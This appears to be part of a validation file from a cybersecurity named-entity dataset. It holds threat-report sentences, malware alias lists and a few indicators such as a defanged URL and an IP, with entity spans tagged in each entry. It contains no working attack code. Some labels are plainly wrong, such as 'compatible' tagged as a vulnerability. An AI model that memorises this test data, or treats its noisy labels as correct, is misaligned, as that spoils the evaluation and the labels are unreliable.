Trojan.Win32.Wingbird Win32/Trojan.d3a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000373", "source": "cyner2_valid"}} {"text": "A few days before the publishing of this blog post I came across an unknown RTF exploit sample which I could not identify as being an exploit targeting a known vulnerability like CVE-2012-0158 or CVE-2014-1761.", "spans": {"Malware: unknown RTF exploit": [[68, 87]], "Malware: exploit": [[134, 141]], "Vulnerability: vulnerability": [[160, 173]]}, "info": {"id": "cyner2_valid_000374", "source": "cyner2_valid"}} {"text": "The submission in this case was an email attachment, Free_Hosting.doc, a Rich Text Format RTF document that attempts to exploit CVE-2015-1641.", "spans": {"Vulnerability: exploit": [[120, 127]]}, "info": {"id": "cyner2_valid_000375", "source": "cyner2_valid"}} {"text": "This ongoing campaign appears to target primarily state and local government agencies and educational institutions in the United States.", "spans": {"Organization: state": [[50, 55]], "Organization: local government agencies": [[60, 85]], "Organization: educational institutions": [[90, 114]]}, "info": {"id": "cyner2_valid_000376", "source": "cyner2_valid"}} {"text": "Today, Proofpoint researchers observed the document exploit being used in a large email campaign distributing the Dridex banking Trojan.", "spans": {"Organization: Proofpoint researchers": [[7, 29]], "Malware: Dridex banking Trojan.": [[114, 136]]}, "info": {"id": "cyner2_valid_000377", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Spyware.OnlineGames Trojan-Downloader.Win32.Banload.aavkj Win32.Trojan.Spy.Agky Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R TrojanDownloader:Win32/Asnep.A Trojan-Downloader.Win32.Banload.aavkj Trojan.Antavmu", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000379", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9988 Win.Trojan.Merong-1 
Trojan.Win32.Crypted.crabdz Trojan.DownLoader8.6826 Virus.Win32.Malware Trojan/Win32.Unknown Trojan:Win32/Godin.A Trojan/Win32.Scar.R81257 Trojan.Downloader W32/Downloader_a.SU!tr Win32/Trojan.cb1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000380", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.NSIS!O Trojan.Win32.Goriadu.wqbho Trojan.Bohu TROJ_GORIADU.SMX Trojan-Dropper.Win32.NSIS.vh Trojan.Goriadu TROJ_GORIADU.SMX RiskWare[RiskTool:not-a-virus]/Win32.DllChander TrojanDropper:Win32/Bohu.B Trojan.Ferz.xl PE:Trojan.Win32.AntiCloudAV.l!1075334204", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000381", "source": "cyner2_valid"}} {"text": "After the encryption of the files, a ransom note appears, demanding a payment in Bitcoins to retrieve the files.", "spans": {}, "info": {"id": "cyner2_valid_000383", "source": "cyner2_valid"}} {"text": "During this stage of the activation cycle , the malware increases the beaconing time to avoid detection .", "spans": {}, "info": {"id": "cyner2_valid_000384", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Spambot.BXB Trojan.Spambot.BXB TROJ_SPAMBOT.B Win32.Trojan.WisdomEyes.16070401.9500.9785 W32/Backdoor.AJPB Trojan.SpamThru TROJ_SPAMBOT.B Win.Trojan.Spambot-279 Trojan.Spambot.BXB Trojan.Spambot.BXB Trojan.Spambot.BXB Trojan.Qhost.45065 Backdoor.Win32.09A427D4 BehavesLike.Win32.VTFlooder.cc W32/Backdoor.AJPB TR/SpamBot.bxc Trojan.Downloader-MSDCom32 Trojan/Win32.Qhost.R2082 Trojan.Spambot.BXB Trj/Qhost.HX", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000386", "source": "cyner2_valid"}} {"text": "Based on our research and Benoît Ancel 's tracker , this C2 was used by Wolf Intelligence : Additionally , we identified two empty panels on a C2 server .", "spans": {"Organization: Wolf Intelligence": [[72, 89]]}, "info": {"id": "cyner2_valid_000387", "source": "cyner2_valid"}} {"text": "In 
addition to the P5+1 events, the Duqu 2.0 group has launched a similar attack in relation to the 70th anniversary event of the liberation of Auschwitz-Birkenau.", "spans": {"Malware: Duqu 2.0": [[36, 44]], "Organization: liberation of Auschwitz-Birkenau.": [[130, 163]]}, "info": {"id": "cyner2_valid_000388", "source": "cyner2_valid"}} {"text": "While RETADUP was found in Israeli hospitals, a new variant was targeting specific industries and governments in South America.", "spans": {"Malware: RETADUP": [[6, 13]], "Organization: Israeli hospitals,": [[27, 45]], "Malware: a new variant": [[46, 59]], "Organization: industries": [[83, 93]], "Organization: governments": [[98, 109]]}, "info": {"id": "cyner2_valid_000391", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Kernel32ZX1.Trojan Backdoor.CPEX.Win32.25503 Win32.Trojan.WisdomEyes.16070401.9500.9992 W32/Pws.BUZT Downloader.Bancos Win.Trojan.Wow-1528 Troj.GameThief.W32.WOW.dze!c Packed.Win32.Klone.~KMG Trojan.PWS.Gamania.17290 BehavesLike.Win32.Backdoor.mc Trojan-Downloader.Malwar TR/Dldr.Malwar.C Backdoor:Win32/Spamchn.A Trojan/Win32.OnlineGameHack.R36603 TScope.Trojan.Delf Win32/Delf.NRX", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000392", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Remotemanipulator RiskWare.RemoteAdmin.RMNS not-a-virus:RemoteAdmin.Win32.RemoteManipulator.mz Trojan.Win32.Mlw.euxnyl Trojan.Win32.Z.Teamspy.2479616 BehavesLike.Win32.Dropper.vc TrojanDropper:Win32/Teamspy.A!bit not-a-virus:RemoteAdmin.Win32.RemoteManipulator.mz Trj/CI.A Win32/Virus.RemoteAdmin.745", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000393", "source": "cyner2_valid"}} {"text": "As with most Android ransomware , this new threat doesn ’ t actually block access to files by encrypting them .", "spans": {"System: Android": [[13, 20]]}, "info": {"id": "cyner2_valid_000394", "source": "cyner2_valid"}} {"text": "The malware was 
even found on the phone of Argentinian prosecutor Alberto Nisman, who was murdered in a high-profile case earlier this year.", "spans": {"Malware: malware": [[4, 11]], "Organization: Argentinian prosecutor Alberto Nisman,": [[43, 81]]}, "info": {"id": "cyner2_valid_000395", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Subot.A Backdoor.Subot Backdoor.Subot.A Win32.Trojan.WisdomEyes.16070401.9500.9532 W32/Backdoor.CZN Backdoor.Trojan Win32/Subot.A Backdoor.Subot.A Backdoor.Win32.Subot.a Backdoor.Subot.A Trojan.Win32.Subot.cvpooc Backdoor.Win32.Z.Subot.44544 Backdoor.Subot.A Backdoor.Subot.A BackDoor.IRC.Subot BehavesLike.Win32.Spyware.pc W32/Backdoor.SGCC-5002 Backdoor/Subot.j BDS/Subot.A.1 Backdoor.Subot.A Backdoor.Win32.Subot.a Worm/Win32.IRCBot.R92359 IRC-Subot.dll Backdoor.Subot Win32/Subot.A Win32.Backdoor.Subot.Dwsp Backdoor.Subot!LkDRcBCLS3A Trojan.Win32.Subot W32/Subot.DLL!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000396", "source": "cyner2_valid"}} {"text": "] com hxxp : //mailsa-wqo [ .", "spans": {}, "info": {"id": "cyner2_valid_000397", "source": "cyner2_valid"}} {"text": "There is also evidence to suggest that the actors behind Duuzer are spreading two other threats, detected as W32.Brambul and Backdoor.Joanap, to target more organizations in South Korea.", "spans": {"Malware: Duuzer": [[57, 63]], "Malware: threats,": [[88, 96]], "Organization: organizations": [[157, 170]]}, "info": {"id": "cyner2_valid_000399", "source": "cyner2_valid"}} {"text": "The usage of the PlusShare API in 2020 denotes some unprofessional development , since this is the API to access Google+ .", "spans": {"System: PlusShare": [[17, 26]], "Organization: Google+": [[113, 120]]}, "info": {"id": "cyner2_valid_000400", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.KillProc.A3 Trojan/VB.asy Win32.Trojan.VB.z W32/TrojanX.NAI Win32/Tnega.XXFMWcB TSPY_FAMALIS.A Trojan.Win32.VB.asy 
Trojan.Win32.VB.csnmkd W32.W.VB.l6tP TrojWare.Win32.VB.ASY Trojan.KillProc.16483 Trojan.VB.Win32.97860 TSPY_FAMALIS.A Backdoor.Win32.Bifrose W32/Trojan.WDEF-6301 Trojan/VB.cntm TR/Spy.Famalis.2 Trojan/Win32.VB Trojan:Win32/KillProc.P Trojan.Heur.bmLfrrUJ1Pkif Trojan.Win32.A.VB.22879[UPX] Trojan/Win32.Banker.R2087 Trojan.VB Win32/VB.ASY Trojan.VB!szSq0VUDjtM", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000401", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9951 W32/Trojan.FNFD-0051 Backdoor.Trojan Trojan.Win32.Spy TR/Spy.98304.594 Trojan.Heur.EB5C23 PWS:Win32/Tendrit.B Win32.Trojan.Spy.Pdcw Win32/Trojan.Spy.03b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000402", "source": "cyner2_valid"}} {"text": "If the device does not meet the criteria , it wo n't receive any data , otherwise , it will be redirected to a second server to receive a copy of the malware to install on their device .", "spans": {}, "info": {"id": "cyner2_valid_000403", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.MSIL.SpyGate.slb Trojan.Win32.Bladabindi.dkknqf Trojan.DownLoader10.46445 TrojanDropper:MSIL/Trosedo.A Trojan.Zusy.D1BDE0 Backdoor.MSIL.SpyGate.slb Trj/CI.A Win32.Trojan.Dropper.Hsiw Backdoor.MSIL.Fertile MSIL/Bladabindi.R!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000405", "source": "cyner2_valid"}} {"text": "Observe below the code routine for call recording .", "spans": {}, "info": {"id": "cyner2_valid_000406", "source": "cyner2_valid"}} {"text": "A Russian-language phishing campaign active during the second week of August 2017, targeting not the usual banking customers, but the Russian banks themselves.", "spans": {"Organization: banking customers,": [[107, 125]], "Organization: the Russian banks": [[130, 147]]}, "info": {"id": "cyner2_valid_000408", "source": 
"cyner2_valid"}} {"text": "Last month, CrowdStrike published a blog on malware campaigns attributed to Sakula.", "spans": {"Organization: CrowdStrike": [[12, 23]], "Malware: Sakula.": [[76, 83]]}, "info": {"id": "cyner2_valid_000409", "source": "cyner2_valid"}} {"text": "What makes Ginp stand out is that it was built from scratch being expanded through regular updates , the last of which including code copied from the infamous Anubis banking Trojan , indicating that its author is cherry-picking the most relevant functionality for its malware .", "spans": {"Malware: Ginp": [[11, 15]], "Malware: Anubis": [[159, 165]]}, "info": {"id": "cyner2_valid_000410", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Win32.Netsnake!O Backdoor.Netsnake Backdoor/Netsnake.i Trojan.Graftor.D7A66 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Powerspider Backdoor.Win32.Netsnake.i Trojan.Win32.Netsnake.bskwtr Backdoor.W32.Netsnake.i!c BackDoor.Netsnake Backdoor.Netsnake.Win32.75 BehavesLike.Win32.Ipamor.cm Backdoor.Win32.Netsnake Trojan/PSW.PwdBox.f Trojan[Backdoor]/Win32.Netsnake Backdoor.Win32.Netsnake.i Backdoor.Netsnake Backdoor.Netsnake!9OLNh8b9sHY W32/Netsnake.I!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000411", "source": "cyner2_valid"}} {"text": "At any time an infected application will create an activity , this method will be called , and call ‘ requestAd ’ from “ Agent Smith ’ s code .", "spans": {"Malware: Agent Smith": [[121, 132]]}, "info": {"id": "cyner2_valid_000412", "source": "cyner2_valid"}} {"text": "This malicious document connects to a perfectly legitimate website to download the final payload.", "spans": {"Malware: malicious document": [[5, 23]], "Malware: final payload.": [[83, 97]]}, "info": {"id": "cyner2_valid_000413", "source": "cyner2_valid"}} {"text": "We've discovered a new malware family we've named TidePool.", "spans": {"Malware: malware family": [[23, 37]], "Malware: TidePool.": [[50, 
59]]}, "info": {"id": "cyner2_valid_000414", "source": "cyner2_valid"}} {"text": "Collect information on surrounding cellular towers ( BTS ) .", "spans": {}, "info": {"id": "cyner2_valid_000415", "source": "cyner2_valid"}} {"text": "Like FakeDefender and DataLust , Charger could be an indicator of a wider effort by mobile malware developers to catch up with their PC ransomware cousins .", "spans": {"Malware: FakeDefender": [[5, 17]], "Malware: DataLust": [[22, 30]], "Malware: Charger": [[33, 40]]}, "info": {"id": "cyner2_valid_000416", "source": "cyner2_valid"}} {"text": "Throughout September 2016 we have observed an actor sending malware to Canadian nationals by e-mail.", "spans": {"Malware: malware": [[60, 67]]}, "info": {"id": "cyner2_valid_000417", "source": "cyner2_valid"}} {"text": "The source of this compromise was traced to an SSH brute force attack that took place earlier the same month.", "spans": {}, "info": {"id": "cyner2_valid_000419", "source": "cyner2_valid"}} {"text": "It is now clear that a distinct industry has developed and is becoming more focused on extracting profits , which is clearly evident from the functionality of the malware .", "spans": {}, "info": {"id": "cyner2_valid_000420", "source": "cyner2_valid"}} {"text": "We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved.", "spans": {"Organization: government": [[60, 70]], "Organization: the Chinese government": [[226, 248]]}, "info": {"id": "cyner2_valid_000421", "source": "cyner2_valid"}} {"text": "The website of the Jerusalem Post was manipulated and linked to a harmful third party.", "spans": {"Organization: the Jerusalem Post": [[15, 33]]}, "info": {"id": "cyner2_valid_000423", "source": "cyner2_valid"}} {"text": "We have seen this threat connect to a 
remote host, including: pic-save.pw using port 80", "spans": {"Malware: threat": [[18, 24]], "System: a remote host,": [[36, 50]]}, "info": {"id": "cyner2_valid_000424", "source": "cyner2_valid"}} {"text": "The malware collects all data such as passwords, keystrokes and screenshots, then sends it to the attackers.", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "cyner2_valid_000425", "source": "cyner2_valid"}} {"text": "The malware targets Puma 5 ARM/Big Endian cable modems, including the ARRIS TG862 family.", "spans": {"Malware: malware": [[4, 11]], "Malware: Puma 5": [[20, 26]], "System: cable modems,": [[42, 55]], "System: ARRIS TG862 family.": [[70, 89]]}, "info": {"id": "cyner2_valid_000426", "source": "cyner2_valid"}} {"text": "FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows.", "spans": {"Organization: FireEye Labs": [[0, 12]], "Vulnerability: zero-day vulnerabilities": [[65, 89]], "System: Adobe Flash": [[93, 104]], "System: Microsoft Windows.": [[128, 146]]}, "info": {"id": "cyner2_valid_000427", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Heur.Corrupt.PE KIT/NGVCK.035.A Constructor:Win32/NGVCK.dam#2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000428", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor/W32.Alcobot.71200 W32.Alcaul.N Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Alcobot.A Win.Trojan.Sdbot-5 Trojan.Win32.Alcobot.dbgj Backdoor.W32.Alcobot!c Backdoor.Win32.Alcobot.A BackDoor.IRC.Sdbot.based Backdoor.Alcobot.Win32.1 BehavesLike.Win32.Backdoor.kh Backdoor/Alcobot.a W32/Alcaul.N.2 Trojan[Backdoor]/Win32.IRCBot Backdoor.IRCBot Bck/Sdbot.MQ Win32/Alcobot.A Win32.Backdoor.Ircbot.Hqbt Backdoor.Alcobot!xDJoHsLDI10 Backdoor.Win32.SdBot W32/IRCBot.GNE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000430", "source": "cyner2_valid"}} {"text": 
"While all versions of Microsoft Windows the worm touched in the attack were compromised, a number of Windows XP machines crashed and failed to restart: despite its renewed potency, the programmers behind Qbothadn't built their bot to be compatible with older versions of Windows.", "spans": {"System: versions": [[10, 18]], "System: Microsoft Windows": [[22, 39]], "Malware: worm": [[44, 48]], "System: Windows XP machines": [[101, 120]], "Malware: Qbothadn't": [[204, 214]], "Malware: bot": [[227, 230]], "Vulnerability: compatible": [[237, 247]], "System: older versions of Windows.": [[253, 279]]}, "info": {"id": "cyner2_valid_000431", "source": "cyner2_valid"}} {"text": "However , the malware wouldn ’ t want to depend on user interaction to trigger the ransomware screen , so , it adds another functionality of Android callback : As the code snippet shows , the malware overrides the onUserLeaveHint ( ) callback function of Activity class .", "spans": {"System: Android": [[141, 148]]}, "info": {"id": "cyner2_valid_000432", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Downloader.Ufraie.Win32.91 Trojan.Win32.Crypted.cnebvo Trojan/Vilsel.zrc TR/AD.Ufraie.bdftd Trojan/Win32.Vilsel Win32.Troj.Undef.kcloud Win32/TrojanDownloader.Ufraie.B Trojan.Win32.Vilsel Win32/Trojan.c5b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000433", "source": "cyner2_valid"}} {"text": "Here it is, the Kelihos botnet back with a bang.", "spans": {"Malware: Kelihos botnet": [[16, 30]]}, "info": {"id": "cyner2_valid_000436", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.W.VBNA.tni6 Win32.Trojan.WisdomEyes.16070401.9500.9894 Trojan.Click.origin BehavesLike.Win32.Dropper.mc Win32.Hack.Rukap.gi.kcloud Trojan/Win32.Rukap.C27879 Trojan-PWS.Win32.LdPinch", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000437", "source": "cyner2_valid"}} {"text": "The “ Agent Smith ” campaign serves as a sharp reminder that effort 
from system developers alone is not enough to build a secure Android eco-system .", "spans": {"Malware: Agent Smith": [[6, 17]], "System: Android": [[129, 136]]}, "info": {"id": "cyner2_valid_000440", "source": "cyner2_valid"}} {"text": "A backdoor also known as: JS.Pdfjsc.K JS/Exploit!JNLP.d JS.Exploit.Pdfka.ie JS/Crypted.DT JS_PIDIEF.SMC Exploit.Shellcode.BJ Exploit.JS.Pdfka.vn Exploit.Script.Pdfka.cfeira Exploit.PDF.869 JS_PIDIEF.SMC BehavesLike.PDF.Obfuscated.xb PDF/Obfusc.F!Camelot Trojan[Exploit]/JS.Pdfka.bf Exploit.JS.Pdfka.vn PDF/Pidief.ML Exploit.Shellcode.BJ Exploit.JS.Pdfka.vn Exploit.Win32.Pidief virus.exp.pdfjs", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000441", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.ScaraNV.Trojan Trojan/W32.Scar.1222301 TrojanDropper.Scudy.S12799 WORM_SCUDY.SMA Trojan.Win32.A.Scar.876573 TrojWare.Win32.Scar.A Trojan.Click1.19227 Trojan/Scar.flx Trojan.Midie.D8D49 Trojan/Win32.Scar.R45219 Trojan.Scar Trojan.Dropper Trojan.Scar!3JbHUSbGsGc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000443", "source": "cyner2_valid"}} {"text": "What it does The surveillance functionality of Desert Scorpion resides in a second stage payload that can only be downloaded if the victim has downloaded , installed , and interacted with the first-stage chat application .", "spans": {"Malware: Desert Scorpion": [[47, 62]]}, "info": {"id": "cyner2_valid_000444", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.RVEQ-2899 Trojan.Win32.SchoolBoy.ath Trojan.Win32.Renaz.cythcw Trojan.KillProc.14048 BehavesLike.Win32.Backdoor.lm TR/Renaz.3584.1 Trojan.Win32.SchoolBoy.ath TrojanDropper:Win32/Lucuis.A Trojan/Win32.CSon.R8749 BScope.P2P-Worm.Palevo Trj/CI.A Win32.Trojan.Schoolboy.Eddr Trojan.PWS.OnLineGames!IrZfNSgvphg Backdoor.Win32.Poison Win32/Trojan.95c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_000445", "source": "cyner2_valid"}} {"text": "Clicking on thenotification will result in launching a specified app startApp Starts the specified application getInstallApps Gets the list of installedapplications on the infected device getContacts Gets the contact names and phone numbers from the addressbook on the infected device deleteApplication Triggers the deletion of the specified application forwardCall Enables call forwarding to the specified number sendSms Sends a text message with specified text from the infecteddevice to the specified phone number startInject Triggers the overlay attack against the specified application startUssd Calls the specified USSD code openUrl Opens the specified URL in the WebView getSMS Gets all text messages from the infected device killMe Triggers the kill switch for the bot updateModule Updates the payload module Cerberus features Cerberus malware has the same capabilities as most other Android banking Trojans such as the use of overlay attacks , SMS control and contact list harvesting .", "spans": {"Malware: Cerberus": [[817, 825], [835, 843]], "System: Android": [[892, 899]]}, "info": {"id": "cyner2_valid_000446", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Backdoor.Trojan Trojan.Win32.HideBaid.dzvwho Trojan.Win32.Z.Zusy.45421 Trojan.Baidu.1671 BehavesLike.Win32.Dropper.pt W32/Trojan.LSBJ-7344 Trojan.Zusy.D2C124 Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000448", "source": "cyner2_valid"}} {"text": "Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years.", "spans": {"Organization: Mandiant": [[0, 8]], "Malware: backdoor": [[109, 117]], "System: victim environments": [[128, 147]]}, "info": {"id": "cyner2_valid_000449", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
Trojan.DownLoader.17329 Trojan.Horst.Win32.3637 BehavesLike.Win32.Sality.cm Trojan-Proxy.Win32.Horst TrojanProxy.Horst.gi Trojan[Proxy]/Win32.Horst Trojan/Win32.Horst.C106446 MalwareScope.Trojan-Proxy.Horst.1 W32/Medbot.DS!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000450", "source": "cyner2_valid"}} {"text": "Symantec has found that South Korea is being impacted by an active back door Trojan, detected as Backdoor.Duuzer.", "spans": {"Organization: Symantec": [[0, 8]], "Malware: back door Trojan,": [[67, 84]]}, "info": {"id": "cyner2_valid_000451", "source": "cyner2_valid"}} {"text": "For traffers that is, actors bringing traffic to a malicious destination; for example, exploit kits that rely on malvertising, one of the goals is to gain access to a high-profile ad network such as DoubleClick, Bing Ads, AdTech or AppNexus.", "spans": {"Malware: exploit kits": [[87, 99]], "Organization: high-profile ad network": [[167, 190]], "Organization: DoubleClick, Bing Ads, AdTech": [[199, 228]]}, "info": {"id": "cyner2_valid_000452", "source": "cyner2_valid"}} {"text": "The IP address of this website is 115.144.107.55.", "spans": {}, "info": {"id": "cyner2_valid_000453", "source": "cyner2_valid"}} {"text": "However, by late August 2017, this campaign began pushing a different type of malware.", "spans": {"Malware: malware.": [[78, 86]]}, "info": {"id": "cyner2_valid_000455", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Hesv.303104 Trojan.Hesv.Win32.40 Trojan/Injector.dsqm Win32.Trojan.WisdomEyes.16070401.9500.9751 Trojan.Trickybot Trojan.Win32.Hesv.bnqd Trojan.Win32.Hesv.etvgle Trojan.DownLoader25.46858 BehavesLike.Win32.PWSZbot.dc Trojan.Hesv.fs TR/AD.Inject.ssylq Trojan.Win32.Hesv.bnqd Trojan/Win32.Hesv.R210998 Trojan.Hesv Spyware.TrickBot Trojan.Hesv!", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000456", "source": "cyner2_valid"}} {"text": "From what we've seen, ChessMaster is 
continuously evolving, using open source tools and ones they developed, likely as a way to anonymize their operations.", "spans": {"Malware: ChessMaster": [[22, 33]], "Malware: open source tools": [[66, 83]]}, "info": {"id": "cyner2_valid_000457", "source": "cyner2_valid"}} {"text": "It usually impersonates flash player updaters, android system tools, or other legitimate applications.", "spans": {"System: android system tools,": [[47, 68]], "System: legitimate applications.": [[78, 102]]}, "info": {"id": "cyner2_valid_000458", "source": "cyner2_valid"}} {"text": "Scammers do so by riding on the popularity of existing applications, embedding them with unwanted content—even malicious payloads—and masquerading them as legitimate.", "spans": {}, "info": {"id": "cyner2_valid_000459", "source": "cyner2_valid"}} {"text": "The Executive Yuan has several individual boards which are formed to enforce different executing functions of the government.", "spans": {"Organization: The Executive Yuan": [[0, 18]], "Organization: individual boards": [[31, 48]], "Organization: government.": [[114, 125]]}, "info": {"id": "cyner2_valid_000460", "source": "cyner2_valid"}} {"text": "He can, for example, configure MalumPoS to include Radiant or NCR Counterpoint PoS systems to its target list.", "spans": {}, "info": {"id": "cyner2_valid_000462", "source": "cyner2_valid"}} {"text": "] 213 To backdoor legitimate applications , attackers used a Smali injection technique – a type of injection that allows attackers to disassemble the code of original app with the Baksmali tool , add their malicious code , and assemble it with Smali .", "spans": {}, "info": {"id": "cyner2_valid_000463", "source": "cyner2_valid"}} {"text": "ITG08 likely gains initial access to victim networks by using stolen login credentials belonging to users of the victim organization or to users of trusted third-party entities which had remote access to the victim's network i.e. 
VPN access.", "spans": {"System: victim networks": [[37, 52]], "Organization: victim organization": [[113, 132]], "Malware: remote access": [[187, 200]], "System: victim's network": [[208, 224]], "System: VPN": [[230, 233]]}, "info": {"id": "cyner2_valid_000464", "source": "cyner2_valid"}} {"text": "Government agencies and enterprises should plan to be hit from all angles - cloud services , mobile devices , laptops - in order to build comprehensive security strategies that work .", "spans": {}, "info": {"id": "cyner2_valid_000465", "source": "cyner2_valid"}} {"text": "This kind of malware, as mentioned in previous posts Dridex, Bartallex, usually arrives as an attached document within a phishing email.", "spans": {"Malware: malware,": [[13, 21]], "Malware: Dridex, Bartallex,": [[53, 71]]}, "info": {"id": "cyner2_valid_000466", "source": "cyner2_valid"}} {"text": "Once the targeted website is launched , the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure .", "spans": {"System: Google ads": [[117, 127]]}, "info": {"id": "cyner2_valid_000467", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win.Trojan.Dropper-20281 Trojan.Win32.Chomioy.ewrfrb Trojan.DownLoader5.48130 TR/AD.Chomioy.pwiho Trojan:Win32/Chomioy.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000468", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.2AA9 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Clampi Trojan.Win32.FKM.ewldln BehavesLike.Win32.Virut.gc Trojan.Win32.Pakes Trojan.DNSChanger-Installer Win32/Trojan.36b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000469", "source": "cyner2_valid"}} {"text": "A backdoor also known as: VEXB204.Webshell Backdoor.PHP.A PHP/C99shell.R Backdoor.PHP.C99Shell.A PHP.Backdoor.C99Shell.d PHP/CShell.Y Backdoor.Trojan PHP/C99Shell.A Php.Trojan.C99Shell-2 Backdoor.PHP.C99Shell.p Backdoor.PHP.A 
Trojan.Script.C99Shell.wahxr Backdoor.Win32.C99Shell.2622[h] Backdoor.PHP.C99Shell.p!c Backdoor.PHP.A Backdoor.PHP.A PHP.Rst.5 PHP_C99SHELL.AB BehavesLike.JS.Backdoor.cm PHP/CShell.Y PHP/C99Shell.B PHP/C99shell.BGT!tr Trojan[Backdoor]/PHP.C99Shell Backdoor.PHP.A Backdoor.PHP.C99Shell.p Backdoor:PHP/C99shell.U PHP/C99shell.E Backdoor.PHP.C99Shell.y Php.Backdoor.C99shell.Pcsh PHP.ShellBot.K Trojan.Php.C99shell Backdoor.PHP.A PHP/BackDoor.DK HackTool/PHPC99Shell.B php.script.c99shell.10", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000470", "source": "cyner2_valid"}} {"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT .", "spans": {}, "info": {"id": "cyner2_valid_000471", "source": "cyner2_valid"}} {"text": "Specifically , Lookout determined these were trojanized versions of the apps SR Chat and YeeCall Pro .", "spans": {"Organization: Lookout": [[15, 22]], "System: SR Chat": [[77, 84]], "System: YeeCall Pro": [[89, 100]]}, "info": {"id": "cyner2_valid_000472", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Xifos BKDR_XIFOS.D Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.KIOQ-6335 BKDR_XIFOS.D BackDoor.Foxy.5 TR/Spy.13824.248 Trojan/Win32.Unknown Backdoor:Win32/Xifos.A Downloader/Win32.Small.C61027 BScope.Trojan-Spy.Zbot Win32.Trojan.Spy.Ssqx Trojan.Win32.Spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000473", "source": "cyner2_valid"}} {"text": "Two weeks ago , Some Chinese Security Researchers have also detected a bootkit called 'Oldboot ' , possibly the same malware or another variant of it .", "spans": {}, "info": {"id": "cyner2_valid_000474", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Risktool.Bitminer Worm.Win32.Dropper.RA Trojan.Trick.45126 RiskTool.BitCoinMiner.eni RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Sminager.E 
